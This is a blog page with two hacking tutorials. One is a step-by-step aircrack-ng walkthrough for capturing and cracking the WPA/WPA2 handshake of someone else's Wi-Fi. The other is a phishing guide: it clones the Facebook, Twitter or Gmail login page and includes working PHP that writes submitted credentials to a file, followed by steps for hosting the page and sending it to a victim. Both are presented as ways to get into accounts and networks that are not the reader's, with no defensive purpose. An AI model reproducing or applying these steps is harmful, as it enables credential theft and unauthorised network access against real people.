Showing posts with label HACK. Show all posts
Showing posts with label HACK. Show all posts

Thursday, 8 December 2016

How to Hack WPA & WPA2 WIFI



Hi Everyone forget about internet data charges..! lets hack encrypted wifi network with simple skills im here to guide you the best way for hacking of wifi network


This method for kali linux users and im gonna make another tutorial for android users ok.lets start our work

open Terminal then follow the given steps ...

step 1-  airmon-ng









 step 2-   airmon-ng start wlan0

 

step 3type airodump-ng followed by the name of the new monitor interface

step 4now it shows wifi signals select the prefered wifi like the image below

 

step 5copy the BSSID of target network


 

step 6-   now the the following command airodump-ng -c (channel) --BSSID (PASTE THAT BBSID) -W/root/Desktop/(monitor interface)     i.e wlan0 or wlan0mon

for eg., airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

step 7- now open new terminal then type the following

aireplay-ng -0 4 -a (BSSID) -C  (PWR ID) "wlan0mon" or "wlan0"

  

step 8-   after hitting enter you will see the aireplay sends packet after few minutes in the upper right corner u will get HANDSHAKE





step 9- aircrack-ng -a2 -b (wpa handshake id) -w /root/Desktop/wordlist.txt /root/Desktop/.*cap

 Now press enter then it search for the target wifi password and shows you the exact key

 here the proof..


FOR CREATING WORDLIST VISIT MY YOUTUBE CHANNEL -CLICK HERE 
Read More

Wednesday, 2 November 2016

FACEBOOK-TWITTER-GMAIL HACK

HERE I WIL TEACH HOW TO HACK FACEBOOK.,TWITTER.,GMAIL.,YAHOO.etc..
USING PHISHING PAGE


step 1- go to facebook.com (login page) optional (twitter.,gmail., yahoo)

step 2-right click ---> page source


step 3- copy that source and paste it in notepad ..then search for action=" https://www.facebook.com/login.php?login_attempt=1 "

then delete 
" https://www.facebook.com/login.php?login_attempt=1 "

and rewrite it as "hack.php" then save it as index.htm

step 4- make another file copy the below php

<?php
header ('Location:http://www.google/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


save it as hack.php

step 5- signup in any hosting site eg.,www.my3gb.com

then open flemanager in hosting--->upload both files



after uploading select index file url send it to victim...when victim enters into tht url it wil directs him to fake login page ..after he enters his login details it wil shows u in ur hosting account like below







Read More